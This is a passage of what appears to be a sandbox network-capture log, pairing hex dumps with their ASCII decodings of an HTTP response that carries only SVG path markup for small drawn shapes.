                                                                                                                                                                                                                                                  Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2405INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                  Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2421INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2437INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                  Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2453INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2469INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                  Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2485INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2501INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                  Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2517INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2533INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                  Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2549INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                  Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2565INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2581INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2597INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2613INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                  Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2629INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                  Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2645INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2661INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                  Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
